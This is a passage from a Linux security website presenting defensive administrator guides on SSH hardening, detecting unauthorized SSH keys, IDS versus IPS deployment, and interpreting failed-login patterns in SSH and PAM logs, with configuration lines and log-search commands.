if recovery becomes necessary. A bad sudo configuration has locked out more than a few administrators over the years. Restrict Which Accounts Can Connect Most Linux systems accumulate accounts over time. Migration accounts. Service accounts. Former contractors. Temporary support accounts. Test users who survived long after the project ended. Every account capable of SSH authentication increases exposure. An attacker only needs one overlooked account to establish a foothold Start by identifying which users actually require shell access. For small environments: AllowUsers adminuser backupadmin For larger environments: AllowGroups ssh-admins Verify the active configuration: sshd -T | grep allow Group-based controls are usually easier to maintain because access decisions happen through centralized identity management rather than edits on individual servers. The goal is simple. Most accounts should never receive an SSH prompt. Restrict Where SSH Connections Can Originate Valid credentials from the wrong network should still raise concerns. Many organizations expose SSH directly to the internet because key-based authentication feels sufficient. In practice, reducing exposure often provides more value than adding another authentication mechanism. A compromised key cannot be used against a service that is unreachable. Common approaches include: VPN-only administration Bastion hosts Firewall allowlists Dedicated management networks Example firewall restriction: sudo firewall-cmd \ --permanent \ --add-rich-rule='rule family="ipv4" source address="10.10.10.0/24" service name="ssh" accept' Verify access before removing existing rules. Restricting source networks introduces operational complexity. Administrators working remotely, emergency maintenance windows, and third-party support arrangements all need consideration before implementation. Reduce Authentication Abuse Most attacks against SSH begin before authentication succeeds. Attackers probe exposed services constantly, testing usernames, attempting authentication, and establishing largenumbers of concurrent connections. Several OpenSSH settings help reduce this activity. Review current values: sshd -T | egrep 'maxauthtries|logingracetime|maxstartups' Recommended starting point: MaxAuthTries 3 LoginGraceTime 30 MaxStartups 10:30:60 Reload SSH: sudo systemctl reload sshd These controls will not stop a determined attacker. They reduce opportunities and force attackers to work harder while generating more visible activity in logs. Disable Features You Don't Use Many SSH deployments leave optional functionality enabled simply because it was never reviewed. That creates an unnecessary attack surface. Agent Forwarding Agent forwarding allows authentication requests to pass through intermediate systems. Administrators often use it when connecting through bastion hosts. The risk appears when an intermediary host becomes compromised. An attacker may be able to use the forwarded agent during an active session to authenticate against additional systems. Check the current setting: sshd -T | grep allowagentforwarding Disable if not required: AllowAgentForwarding no Port Forwarding Port forwarding is one of SSH's most useful features. It's also one of the easiest ways to bypass network segmentation. An attacker with legitimate SSH access may create tunnels into systems that were never intended to be reachable from their current location. Disable when unnecessary: AllowTcpForwarding no Review existing workflows before making the change. Database administration tools, internal dashboards, and maintenance procedures often depend on SSH tunnels. X11 Forwarding Most servers no longer require graphical applications. Yet many environments continue running with X11 forwarding enabled. Check: sshd -T | grep x11forwarding Disable if unused: X11Forwarding no If nobody can explain why the feature is enabled, that is usually your answer. Kill Idle Administrative Sessions Abandoned SSH sessionscreate unnecessary risk. An unlocked terminal left connected to a production server may be all an attacker needs after compromising a workstation. Shared administration systems and jump hosts make the problem worse. Review current settings: sshd -T | egrep 'clientalive' Recommended starting point: ClientAliveInterval 300 ClientAliveCountMax 2 This configuration disconnects inactive sessions after roughly ten minutes. Choose values that fit operational requirements. Security teams tend to prefer shorter timeouts. Administrators performing long-running maintenance often prefer longer ones. Add Multi-Factor Authentication SSH keys prove possession of a private key. They do not prove that the person holding that key should still have access. If a workstation is compromised or a private key is stolen, authentication may still succeed. OpenSSH supports multi-factor authentication through PAM integrations and hardware-backed authentication methods. Example configuration: AuthenticationMethods publickey,keyboard-interactive Verify carefully before deployment. Misconfigured MFA can create widespread access failures during maintenance windows. Test with non-production systems first. Monitor SSH as an Administrative Control SSH logs often receive attention only after an incident. That is too late. Administrative access should generate the same level of visibility as privileged activity inside cloud platforms, identity providers, and critical applications. Watch for: Repeated authentication failures New source IP addresses Logins outside normal maintenance windows Unexpected root escalation New SSH keys added to privileged accounts SSH tunnel creation on sensitive systems Examples: journalctl -u sshd grep "Accepted" /var/log/secure grep "Failed" /var/log/auth.log Authentication success should not automatically equal trust. A valid administrator account can still be abused. Final SSH Hardening Checklist Highimpact, low effort: Disable password authentication Disable direct root login Restrict administrative accounts Patch OpenSSH regularly Remove unused SSH keys Restrict source networks where possible Medium effort: MFA for administrative access Disable unnecessary forwarding features Session timeout controls Centralized logging SSH activity alerting Advanced deployments: Bastion hosts SSH certificates Hardware-backed authentication Session recording Centralized access approval workflows Zero Trust access controls Conclusion Password authentication is usually the first SSH control that organizations remove. It should not be the last control they implement Strong SSH security comes from reducing exposure, restricting access, limiting privilege, controlling sessions, and maintaining visibility after authentication succeeds. The goal is not simply to prevent password attacks. The goal is to reduce opportunities for attackers before, during, and after they obtain a foothold. . That's good advice. It removes entire classes of attacks, including password spraying, credential st. hardening, advice, recommendation, disable, password, authentication. . MaK Ulac

Jun 05, 2026 •

MaK Ulac How to Secure My Network

Detect Unauthorised Ssh Keys Hero Esm H240

security advisoryremote accessauthentication

How to Detect Unauthorized SSH Keys on Linux Systems

Most of the time, nobody notices. SSH authentication succeeds, no alerts are generated, and the connection looks exactly the way it did the day the key was installed. That's part of the problem. . When security teams investigate unauthorized access on Linux systems, they often focus on passwords, exposed services, or vulnerable software. Trusted access receives less attention. Yet a single forgotten or unauthorized SSH key can provide the same access as a legitimate user while attracting very little scrutiny. This guide explains how to identify unauthorized SSH keys, investigate suspicious SSH activity, and determine whether the trust you've granted over time still belongs there. Why Unauthorized SSH Keys Are So Dangerous SSH keys bypass many controls that organizations traditionally depend on. A password-based attack often generates warning signs. Failed authentication attempts appear in logs. Lockout thresholds trigger. Users report suspicious activity. Security tools generate alerts. A valid SSH key behaves differently. When an attacker possesses a legitimate private key, the authentication process may look completely normal. The SSH daemon sees a trusted credential. The login succeeds. No password failures occur. No brute-force signatures appear. Nothing obviously breaks. That makes SSH keys attractive for persistence. An attacker who gains administrative access frequently adds a new public key to an existing account. Sometimes they create a new account. Sometimes they target the root directly. Other times, they hide inside a service account that rarely receives attention because administrators assume it belongs to an application. The objective is simple: maintain access after the original vulnerability gets patched. Keys also support lateral movement. Once attackers compromise one Linux host, they often search for private keys stored in home directories, automation scripts, CI/CD systems, backup repositories, or deployment servers. A single exposed private key can unlockmultiple systems. Suddenly, one foothold becomes several. The dangerous part is that none of this necessarily looks suspicious. The attacker is using a trusted authentication method exactly as it was designed to work. Where SSH Key Abuse Usually Starts Unauthorized SSH key usage rarely begins with SSH itself. The problem usually starts somewhere else in the attack chain: Developer Workstations: A compromised laptop may contain private keys used for production access. Public Repositories: Developers occasionally commit private keys, configuration files, backup archives, or deployment scripts. Automated scanning tools continuously search for exposed secrets. Service Accounts: Many organizations grant broad permissions to automation accounts because restricting access requires additional engineering work. Those accounts often hold keys that provide access across multiple environments. Vendor Access: A contractor receives temporary access to support a project. The project ends. Nobody removes the key. Months later, the account still works. Manually Added Keys: An administrator troubleshooting an outage might temporarily add a key for convenience and forget about it afterward. Step 1: Inventory Authorized SSH Keys Across Linux Systems The first step is understanding what trusted access currently exists. Many organizations cannot answer a simple question: Which SSH keys are authorized across the environment right now? Start by identifying every authorized_keys file . Most administrators immediately think about user accounts, but SSH keys appear in many places: Root accounts Service accounts Application users Automation accounts Dormant accounts Document the username, home directory, public key fingerprint, source system, key owner, business purpose, and date added, if available. This process can be tedious, but detection depends on knowing what normal looks like. If a SOC analyst discovers a public key during an investigation, the first question should be: Who owns this key? Too often, the answer is unknown. That uncertainty creates management blindness. Step 2: Compare Keys Against Known Owners Once an inventory exists, every key should be mapped to a specific owner and business purpose. A key without an owner should immediately attract attention. The same applies to keys associated with former employees, retired systems, completed projects, old vendors, or abandoned automation. Duplicate usage is another warning sign. If the same public key appears across unrelated accounts or systems, investigate why. Shared keys often emerge from convenience-based administration practices. One administrator creates a key pair and distributes it widely because it simplifies management. Convenient. Also dangerous. Compromise that one key and the attacker inherits every trust relationship attached to it. Step 3: Monitor Changes to authorized_keys Periodic audits help, but they are not enough. An attacker does not need to wait for the next quarterly review. They only need a few seconds to add a new key. Focus on locations such as: ~/.ssh/authorized_keys /root/.ssh/authorized_keys Service account SSH directories and configuration files File integrity monitoring can detect additions, removals, and modifications. Linux audit rules can also record changes and identify which process or user performed the action. Monitoring creates a timeline. A timeline reveals who changed what and when. That evidence becomes extremely valuable during incident response. Step 4: Review SSH Authentication Logs Linux authentication logs provide insight into how SSH keys are used after they are installed. Common locations include /var/log/auth.log, /var/log/secure, or journalctl. Review successful public-key authentication events rather than focusing only on failures. Several patterns warrant investigation: Logins originating from unfamiliar IP addresses. Authentication events occurring outside normal maintenance windows. Service accounts thatsuddenly begin interactive logins. Administrator accounts that have remained dormant for months and then become active again. One successful login might be legitimate. Twenty successful logins across ten servers from a previously unseen source network tell a different story. Step 5: Correlate Key Usage With User Behavior A valid key can still be used in an invalid way. Security teams should correlate SSH activity with information about users, devices, networks, and expected administrative behavior. Questions worth asking include: Did the login originate from an approved source IP? Does the user normally access systems from this network? Does the login align with the user's role and approved change tickets? Unauthorized SSH key usage often appears as a context mismatch rather than an authentication failure. The login works exactly as expected. Everything around it does not. Step 6: Look for Persistence Patterns Persistence leaves clues. Not always immediately, but attackers tend to follow recognizable patterns. Watch for a new SSH key appearing shortly after suspicious activity. High-privilege targets deserve special attention. Keys added to root accounts, infrastructure management accounts, or systems with broad sudo privileges carry elevated risk. Watch for the same key appearing across multiple hosts, as an attacker may distribute a trusted key widely. If a login is immediately followed by privilege escalation, file staging, or outbound network connections, you aren't looking at an admin—you’re looking at an adversary. Step 7: Close Audit Gaps Many SSH-related incidents are enabled by process failures rather than technical failures. Organizations often lack a centralized inventory of SSH keys. Alerting is frequently absent. A new key can be added to a production server without generating any notification. Vendor access deserves particular attention. External access is often granted quickly, but removal tends to happen much more slowly. What Security TeamsShould Alert On Security monitoring should generate alerts for: New keys added to privileged accounts Public-key logins from previously unseen source IPs Dormant users authenticating through SSH The same key appearing across unrelated accounts SSH activity outside approved maintenance windows Modifications to the SSH configuration that weaken access controls How to Respond When Abuse Is Suspected The first instinct is often to remove the key immediately. Be careful. Preserve authentication logs, shell history, audit records, and system artifacts before making changes whenever possible. Understanding how the key arrived on the system is just as important as removing it. Identify affected accounts first. Then determine which systems trust the key. Disable or remove suspicious keys only once evidence collection is complete. Rotate exposed keys. Check cron jobs, startup scripts, and scheduled tasks. Look for lateral movement because attackers rarely stop at one host when additional access is available. Prevention: Make SSH Key Trust Verifiable The strongest defense is reducing uncertainty. Every SSH key should have a documented owner, a defined purpose, and a known lifecycle. Centralized inventories help maintain that visibility. Regular reviews help remove stale access. Continuous monitoring helps identify suspicious changes before attackers can establish long-term persistence. Separate human access from service access. Treat SSH keys as privileged credentials, because that is exactly what they are. SSH keys are trusted access mechanisms, but trust alone is not a security control. Once a key is added, many organizations assume the problem is solved. Attackers benefit from that assumption. Unauthorized SSH key usage rarely resembles a brute-force attack. It rarely generates obvious authentication failures. It often looks like a successful login from a credential the system already trusts. That is why detection depends on visibility rather than simple access controls.The key that causes a future incident is often not the newest key in the environment. It is the one nobody remembered to question. Related Reading SSH Key Sprawl on Linux: Unmanaged Access Threats and Cleanup Guide Enhance Linux Server Security Through Effective SSH Best Practices Understanding Linux Persistence Mechanisms and Detection Tools . When security teams investigate unauthorized access on Linux systems, they often focus on passwords,. nobody, notices, authentication, succeeds, alerts, generated. . Dave Wreski

Jun 03, 2026 •

Dave Wreski How to Secure My Network

intrusion detectionapplication securityopen-source

Linux IDS vs IPS: Operational Differences and Deployment Tradeoffs

The wrong IPS rule can look like a security fix right up until it becomes an outage. . On Linux systems, detection and prevention are often discussed together, but they do not carry the same operational risk. One tells admins that something suspicious happened. The other can decide whether traffic is allowed to continue. That is why IDS vs IPS is not just a definition to memorize. It is a deployment decision about where to monitor, where to block, and how much confidence a team needs before letting a tool take action. What Is the Difference Between IDS and IPS? An intrusion detection system, or IDS, monitors activity and generates alerts. It may watch network traffic, logs, file changes, process behavior, or suspicious authentication attempts. An intrusion prevention system, or IPS, monitors activity too, but it can also take action. That action might be dropping packets, resetting a connection, adding a firewall rule, or running a response script. IDS and IPS are not “set it and forget it” tools. They have to be designed, configured, monitored, and maintained like any other security control that becomes part of the environment. The short version: IDS : watches and alerts IPS : watches and blocks IDPS : combines detection and prevention functions The risk changes when a system moves from alerting to blocking. Why Does This Matter on Linux? Linux servers often run quietly in the background. A web server, mail relay, database host, VPN gateway, CI runner, or Kubernetes node may all look normal from the outside until something starts behaving differently. An IDS helps admins notice that difference. It can show repeated scans, suspicious DNS traffic, exploit attempts, unexpected service traffic, or strange activity from a host that should be quiet. An IPS goes further. It can stop traffic before it reaches the service. That sounds better, but it depends on confidence. A false alert wastes time. A false block can take down access, interrupt anapplication, or lock out legitimate users. NOTE: IDS is usually safer when you do not fully understand the traffic yet. IPS makes more sense when the traffic pattern is known, the rule is tested, and the team accepts the risk of automated blocking. How Does an IDS Work? An IDS looks for activity that matches something suspicious. That may include: Known attack signatures Protocol behavior that looks wrong Repeated login failures Unexpected file changes Suspicious outbound connections Traffic patterns that do not fit the server’s role A network IDS inspects traffic. A host-based IDS watches the system itself. Some tools do both, or send alerts into a central platform for review. For example, Suricata can inspect network traffic and write alerts to eve.json. Wazuh can then read those Suricata logs and show the alerts in a dashboard. A simple Wazuh log collection block looks like this: json /var/log/suricata/eve.json That does not block anything. It gives the team something to review. That is often where Linux admins should start. How Does an IPS Work? An IPS uses similar detection logic, but it sits closer to the decision point. When traffic matches a rule, the IPS can block it. The basic split is simple: an IDS detects and alerts, while an IPS moves to block suspicious activity before it reaches the target. That second part is where admins need to slow down, because blocking legitimate traffic is one of the fastest ways to create problems for users and security teams. An IPS is not just “IDS with stronger alerts.” It becomes part of the traffic path. If it fails, slows down, or blocks too much, the impact is operational. That does not mean IPS is bad. It means IPS should be used where the team understands the traffic well enough to trust enforcement. Passive Mode vs Inline Mode The cleanest way to explain IDS vs IPS is placement. Passive mode watches traffic from the side. Inline mode sitsin the path. Passive mode lets Snort observe and detect traffic on an interface. Inline mode gives Snort the ability to block traffic, and the mode changes based on how traffic is passed into Snort . Passive inspection might look like this: snort -i eth0 That tells Snort to inspect traffic on eth0. Inline mode is different: snort -Q --daq afpacket -i "eth0:eth1" Now traffic is moving through paired interfaces. Snort is not just observing. It can affect what passes through. That is the deployment tradeoff in one place. Passive mode gives visibility with less risk. Inline mode gives more responsibility. When Should You Use IDS First? Use IDS first when the environment still needs a baseline. That usually includes: New deployments Busy production networks Servers with unclear traffic patterns Cloud or hybrid environments with limited visibility Teams that are still tuning rules Systems where downtime would be worse than a delayed response IDS helps answer basic questions before blocking begins. What talks to this server? Which alerts are noisy? Which rules fire every day? Which detections actually matter? Which traffic is strange but expected? Do not skip that work. If a team cannot explain the alerts, it probably should not automate the blocks yet. A good IDS phase should produce useful decisions, not just more logs. After a few weeks of review, admins should know which rules are noise, which ones are valuable, and which ones might be safe enough to enforce later. When Does IPS Make Sense? IPS makes sense when the traffic is understood, and the action is worth the risk. Good IPS candidates usually have: A clear traffic path Tested detection rules Low tolerance for the activity being blocked A rollback plan Someone responsible for tuning Logging that shows what was blocked and why A gateway protecting a narrow service may be a good place for IPS. A high-change production segment with poorly understood trafficmay not be. In one setup, Suricata uses Netfilter queues, and iptables sends traffic into that queue for inspection. To run Suricata with NFQUEUE: sudo suricata -c /etc/suricata/suricata.yaml -q 0 To send forwarded gateway traffic to Suricata: sudo iptables -I FORWARD -j NFQUEUE For a host-based setup, traffic can be queued from input and output paths: sudo iptables -I INPUT -j NFQUEUE sudo iptables -I OUTPUT -j NFQUEUE These commands are useful, but they are not casual changes. Once traffic is queued, the inspection path matters. If the queue fails, the behavior depends on how the system is configured. What Can Go Wrong With IPS? IPS problems usually come from confidence moving faster than testing. Common issues include: Legitimate traffic blocked by broad rules Latency from heavy inspection Rules enabled without understanding the impact Missing bypass or failover planning Alerts treated as proof instead of evidence Old exceptions nobody reviews Rule updates are changing behavior unexpectedly The tricky part is that IPS failures may look like normal outages at first. Users cannot reach a service. A deployment fails. A connection resets. A vendor integration stops working. Security may not be the first team blamed, but the IPS may still be the cause. NOTE : If an IPS blocks traffic, the team should be able to answer three questions quickly: what rule fired, what traffic was blocked, and how to reverse the decision if needed. What About Host-Based IDS and IPS? Not all detection happens on the network. Host-based tools watch the Linux system itself. They may monitor logs, file changes, users, processes, commands, or repeated authentication failures. Tripwire for file integrity monitoring fail2ban for blocking repeated login attempts OSSEC or Wazuh for host monitoring and alerting auditd for system-level event visibility Host-based prevention can be useful because it is often narrow. For example, fail2ban may blockan IP after repeated SSH failures. That is easier to reason about than blocking broad application traffic across a network segment. Still, the same rule applies. Automate only what you understand. Blocking one abusive SSH source is different from pushing a bad firewall rule across every Linux server in the environment. How Should Admins Decide? Start with the system’s job. A database host should not behave like a CI runner. A mail relay should not behave like a web server. A backup system may need outbound access that would be strange on another host. Before choosing IDS or IPS, ask: What is this system supposed to receive? What is it supposed to send? Which traffic is normal? Which traffic should never happen? Who reviews alerts? Who owns rule tuning? What happens if prevention blocks the wrong thing? How fast can the team roll back? If the answers are unclear, use IDS first. If the answers are clear and the risk is high, IPS may be appropriate. How Do IDS and IPS Fit With Modern Security Tools? Many teams no longer run IDS and IPS as isolated tools. Detection and prevention may come from firewalls, endpoint agents, SIEM platforms, XDR tools, NDR tools, cloud controls, and Linux-native monitoring. Modern security stacks often combine both ideas: IDS provides monitoring and evidence, while IPS provides control, with many teams now using detection and prevention alongside broader security tooling . That is a useful way to think about it. IDS and IPS are not replacements for patching, hardening, logging, segmentation, access control, or incident response. They support those efforts. The best setup is usually layered. Firewalls limit access. IDS shows suspicious activity. IPS blocks high-confidence threats. Host monitoring catches local behavior. Logs and alerts feed investigation. Admins tune the system as the environment changes. No single layer catches everything. What Linux Admins Should Keep in Mind IDS vs IPS isnot about which one is better. It is about what the system should be trusted to do. Use IDS when you need visibility, context, and safer testing. Use IPS when the traffic is understood, the rule is reliable, and blocking is worth the operational risk. Most Linux environments benefit from both, but not everywhere and not in the same way. Detection can be broad. Prevention should be deliberate. Watch first where context is missing. Block only where confidence is high. Stay Ahead of Linux Security & Infrastructure Trends Interested in more in-depth coverage of Linux monitoring, intrusion detection, firewall behavior, prevention strategies, and enterprise hardening? Subscribe to the LinuxSecurity newsletter for weekly threat analysis, infrastructure security insights, and practical guidance covering the Linux and open-source ecosystem. Related Reading Linux Server Monitoring Essential for Modern Security Operations Understanding Linux Persistence Mechanisms and Detection Tools Strengthening Linux SSH Configurations to Prevent Proxy Attacks Egress Filtering Primer for Monitoring Outbound Traffic . On Linux systems, detection and prevention are often discussed together, but they do not carry the s. wrong, security, right, until, becomes, outage, linux, system. . Dave Wreski

Jun 01, 2026 •

Dave Wreski How to Secure My Network

8.Locks HexConnections CodeGlobe Esm H240

unauthorized accesssecurity techniquesSSH

How To Understand Failed Authentication Patterns in Linux Logs

Exposed SSH servers are continuously hammered by brute-force attacks, password spraying, credential stuffing, and recycled passwords from infostealer dumps. Attackers rotate usernames, test weak credentials, and probe for anything that gives them initial access. The logs usually look messy long before the compromise happens. . The difficult part is separating harmless failures from actual intrusion activity. One failed login from an internal workstation rarely matters. Repeated failures against privileged accounts from cloud VPS ranges usually do. Especially when sudo activity or successful authentication starts appearing afterward. This guide walks through how failed authentication activity appears in Linux SSH and PAM logs, how brute-force attacks differ from password-spraying operations, and how administrators surface suspicious login patterns before attackers establish persistence or reach root access. Raw auth logs get noisy fast. Understand Where Linux Authentication Logs Are Stored Linux distributions store authentication events in different locations depending on the platform. Debian and Ubuntu systems typically write authentication logs to: /var/log/auth.log RHEL, CentOS, AlmaLinux, and Rocky Linux systems usually use: /var/log/secure Modern Linux systems running systemd may also expose authentication activity directly through the system journal: journalctl -u ssh Authentication logs usually contain entries generated by both the SSH daemon ( sshd ) and PAM, which stands for Pluggable Authentication Modules. They appear together because SSH relies on PAM during the authentication process itself. SSH handles the network connection. PAM handles authentication checks, account validation, session management, and policy enforcement. That’s why one SSH login attempt can generate multiple related log entries within seconds. New administrators often think the logs are duplicated at first. They aren’t. Authentication logs generally contain four types of events: Failed login attempts Successful logins Session openings and closures Privilege escalation activity through sudo or su One of the most common ways administrators monitor authentication activity is by tailing logs in real time. sudo tail -f /var/log/auth.log Or on RHEL-based systems: sudo tail -f /var/log/secure “Tailing” logs simply means watching new log entries appear live as the file updates. Authentication events are chronological, so the newest events appear at the bottom. This helps administrators observe SSH activity while reproducing login attempts or investigating suspicious behavior. You can also review SSH-specific events through the journal: journalctl -u ssh That becomes useful on systems where older logs rotate quickly or where journald stores events centrally instead of relying entirely on flat files. Learn What Normal Failed Login Activity Looks Like Most failed authentication events are harmless. Linux systems generate routine login failures constantly during normal operations. Users mistype passwords. Somebody tries the wrong SSH username. A scheduled task continues using an old password after credentials change. Service accounts fail periodically when applications restart with outdated secrets. It happens everywhere. A normal failed SSH login often looks like this: Failed password for john from 192.168.1.25 port 51122 ssh2 You’ll usually see a related PAM entry nearby: pam_unix(sshd:auth): authentication failure; user=john These entries typically belong to the same authentication attempt. SSH records the failed password event while PAM records the internal authentication failure generated during credential validation. A single failed password attempt is common and usually harmless. Administrators should focus more on frequency, repetition, timing, and source behavior instead of isolated events. One failed login from an internal workstation rarely matters. Repeated failures against multiple accounts fromunfamiliar external IP addresses matter a lot more. Authentication logs also help administrators monitor long-term patterns. Repeated failures tied to the same system, user account, or subnet often reveal configuration problems before they become security issues. Sometimes broken automation looks almost identical to credential abuse at first glance. How to Detect Brute Force Attempts in SSH Logs Brute force attacks are usually easy to recognize once the pattern becomes repetitive. Attackers repeatedly attempt passwords against the same account until something works or the target blocks further access. Internet-facing Linux servers see this constantly. Especially SSH services exposed directly to the public internet. Administrative accounts like root get targeted heavily because attackers already know the username exists on many Linux systems. They only need to guess the password. Brute force activity often looks like this: Failed password for root from 185.220.101.4 port 55872 ssh2 Failed password for root from 185.220.101.4 port 55881 ssh2 Failed password for root from 185.220.101.4 port 55903 ssh2 The source IP remains consistent while the connection port changes with each new SSH attempt. That’s normal behavior because every SSH connection opens a separate session. Administrators usually start by searching for failed password events directly: grep "Failed password" /var/log/auth.log To focus specifically on root targeting: grep "Failed password for root" /var/log/auth.log This becomes more useful when combined with IP aggregation: awk '/Failed password/ {print $(NF-3)}' /var/log/auth.log | sort | uniq -c That command extracts source IP addresses from failed authentication entries, sorts them, and counts how often each address appears. Repeated login attempts from the same external IP usually stand out quickly. What matters operationally is repetition. One failed SSH login is normal. Hundreds of failures targeting the same administrativeaccount from the same host usually indicate automation. The MITRE ATT&CK framework tracks brute force authentication abuse under T1110 Brute Force . MITRE documents how attackers automate password guessing against exposed services, administrative accounts, and remote access infrastructure. The behavior described there closely matches what administrators see inside Linux authentication logs during active SSH attacks. Attackers automate these attempts because eventually, weak passwords work. Especially on systems that were not hardened properly after deployment. How to Identify Password Spraying in Linux Authentication Logs Password spraying looks different from traditional brute force activity. Instead of attacking one account repeatedly with many passwords, attackers try a small number of passwords across many usernames. Slower. Quieter too. The goal is to avoid account lockouts while testing reused credentials at scale. Many lockout policies trigger after repeated failures against a single account. Password spraying sidesteps that problem by rotating usernames instead. A spraying attempt may look like this: Failed password for admin from 203.0.113.44 Failed password for backup from 203.0.113.44 Failed password for finance from 203.0.113.44 One source IP rotates through multiple usernames carefully over time. Attackers often target predictable accounts first: admin backup finance support deploy test Administrators can start reviewing spraying behavior with simple searches: grep "Failed password" /var/log/auth.log | awk '{print $11}' Or broader sorting: grep "Failed password" /var/log/auth.log | sort Timestamps matter heavily during spraying investigations. Attackers intentionally spread attempts across longer periods to remain below alert thresholds and avoid triggering lockout policies. Ten failures over an hour often attract less attention than ten failures in thirty seconds, even though the intent is the same. This is why authentication logs should always be reviewed as sequences instead of isolated events. Password spraying tends to look subtle until someone lines up the timestamps properly. How to Investigate Stolen Credential Abuse Failed authentication attempts become much more serious once attackers successfully log in. At that point, the investigation shifts from attempted access to potential compromise. A successful SSH login following repeated failures deserves immediate review. Example: Accepted password for backupadmin from 203.0.113.44 port 60211 ssh2 Then shortly afterward: sudo: session opened for user root That sequence matters because attackers frequently escalate privileges immediately after gaining initial access. Especially if compromised accounts already have sudo access or weak privilege restrictions. Administrators investigating suspicious authentication activity usually begin with successful login searches: grep "Accepted password" /var/log/auth.log Then review privilege escalation events: grep "session opened" /var/log/auth.log A practical investigation workflow usually looks like this: Review failed logins leading up to successful authentication Identify the originating IP address Compare timestamps between failures and successful access Review sudo activity and privilege escalation Determine whether the behavior matches normal operational patterns Suspicious login timing often becomes a strong indicator. Administrative accounts authenticating at unusual hours from unfamiliar IP addresses deserve attention, even if the credentials themselves were valid. Research from Elastic Security Labs and Splunk Security Research consistently emphasizes correlating failed and successful authentication activity together instead of reviewing them independently. Rapid privilege escalation, abnormal login velocity, and suspicious authentication sequencing frequently appear during SSH compromise investigations. This iswhere authentication logs stop being troubleshooting data and start becoming incident response evidence. Understand PAM Authentication Failure Messages PAM messages confuse many administrators because the entries look verbose and disconnected from normal SSH logging. They actually provide useful context once you understand how PAM works during authentication. PAM, or Pluggable Authentication Modules, handles authentication processing for many Linux services, including SSH. During login attempts, PAM modules validate credentials, apply account restrictions, enforce authentication policies, and create sessions. That’s why PAM entries appear beside SSH daemon logs constantly. A typical PAM authentication failure looks like this: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh A successful session creation may appear like this: pam_unix(sshd:session): session opened for user john Administrators commonly search PAM-specific activity using: grep "pam_unix" /var/log/auth.log Or through the system journal: journalctl | grep pam PAM logs supplement SSH logs by showing different stages of authentication processing. One SSH login attempt may generate multiple PAM events, including: authentication failure user validation session opened session closed This is normal behavior. PAM modules log actions separately as the authentication process moves through different stages internally. Beginners often assume multiple PAM entries indicate multiple login attempts. Usually, they belong to the same session sequence instead. The Red Hat PAM documentation explains how PAM modules generate authentication and session events during login processing. Understanding those stages helps administrators interpret Linux authentication logs more accurately during both troubleshooting and security investigations. PAM fills gaps that SSH logging alone doesn’t always explain clearly. How to Respond to Suspicious Authentication Activity Once suspicious authentication behavior appears, response speed matters. Attackers rarely stop after gaining initial access. Start by identifying exposed or compromised accounts. Disable accounts showing suspicious activity until the investigation finishes. sudo passwd -l username Review whether Fail2Ban or equivalent rate-limiting protections are active: sudo systemctl status fail2ban Then inspect the SSH daemon configuration d irectly: sudo nano /etc/ssh/sshd_config Several SSH settings reduce exposure significantly: PermitRootLogin no PasswordAuthentication no Disabling password authentication forces SSH key usage instead of credential-based logins. Restricting direct root login removes one of the most heavily targeted accounts from external authentication attempts entirely. Administrators should also review: sudo rules firewall restrictions privileged accounts dormant users MFA coverage SSH key management IP-based access restrictions help reduce the attack surface further on systems that only require administrative access from trusted locations. Continuous log monitoring matters too. Authentication abuse usually escalates gradually. Attackers test footholds quietly first, then move toward privilege escalation once they understand the environment. Most compromises leave warning signs in the logs long before defenders notice the breach itself. Conclusion Failed authentication attempts happen on every Linux system. Most is harmless operational noise. The patterns behind those failures often reveal much more. Brute-force attacks, password-spraying campaigns, and stolen-credential abuse all leave traces in SSH and PAM logs before attackers establish persistence or gain root access. Administrators who understand those patterns can investigate suspicious activity more quickly and reduce the chances of unauthorized access going unnoticed. Authentication logs become far more useful once you stop reading individual entries andstart tracking behavior over time. Repetition matters. Timing matters. Successful logins after repeated failures matter even more. Linux logs look chaotic initially. Eventually, the attack patterns start standing out on their own. Want more Linux security guidance, threat analysis, and hardening tutorials delivered directly to your inbox? Subscribe to the LinuxSecurity.com newsletter for practical updates, emerging threat coverage, and operational Linux administration tips. Related Reading Fail2ban Linux Security Brute Force Protection and Monitoring PAM: Important Risks in Linux Authentication Trust Chain Essential Log Management Tools for Effective Linux Security Detecting Lateral Movement on Linux Systems Without EDR Securing Remote Access to Linux Servers: Best Practices for 2026 . The difficult part is separating harmless failures from actual intrusion activity. One failed login . exposed, servers, continuously, hammered, brute-force, attacks, password, spraying, credential. . MaK Ulac

May 28, 2026 •

MaK Ulac How to Secure My Network

Community Poll

More Polls

Stay Ahead With Linux Security HOWTOs

Refine HOWTOs

Get the latest News and Insights

Community Poll

Is application sandboxing truly safe?

Trending News

Key Considerations for Selecting a Linux Firewall Solution (Understanding the Types of Firewalls)

Updating & Upgrading Linux Distributions: Essential Security Practices

Packet Filtering Overview in Linux Firewalls for Effective Security

How to Install and Secure MariaDB on Ubuntu 24.04

Explore Latest Linux Security HOWTOs

SELinux Troubleshooting: What to Check Before You Disable SELinux

How to Investigate High System Load During a Security Incident

How to Find and Secure Exposed Services on Linux

How to Find and Remove Malicious Cron Jobs on Linux

How to Harden SSH on Linux After Disabling Password Authentication

How to Detect Unauthorized SSH Keys on Linux Systems

Linux IDS vs IPS: Operational Differences and Deployment Tradeoffs

How To Understand Failed Authentication Patterns in Linux Logs

Get the latest News and Insights

Community Poll

Is application sandboxing truly safe?

Trending News

Key Considerations for Selecting a Linux Firewall Solution (Understanding the Types of Firewalls)

Updating & Upgrading Linux Distributions: Essential Security Practices

Packet Filtering Overview in Linux Firewalls for Effective Security

How to Install and Secure MariaDB on Ubuntu 24.04

Powered By

Linux Security - Your source for Top Linux News, Advisories, HOWTOs and Feature Releases

QUICK LINKS

subscribe to newsletters!

Stay Ahead With Linux Security HOWTOs

Refine HOWTOs

Topics

Category

Authors

Published Date

Get the latest News and Insights

Community Poll

Is application sandboxing truly safe?

Trending News

Explore Latest Linux Security HOWTOs

Get the latest News and Insights

Community Poll

Is application sandboxing truly safe?

Trending News

Search Topics

Powered By

Linux Security - Your source for Top Linux News, Advisories, HOWTOs and Feature Releases

QUICK LINKS

subscribe to newsletters!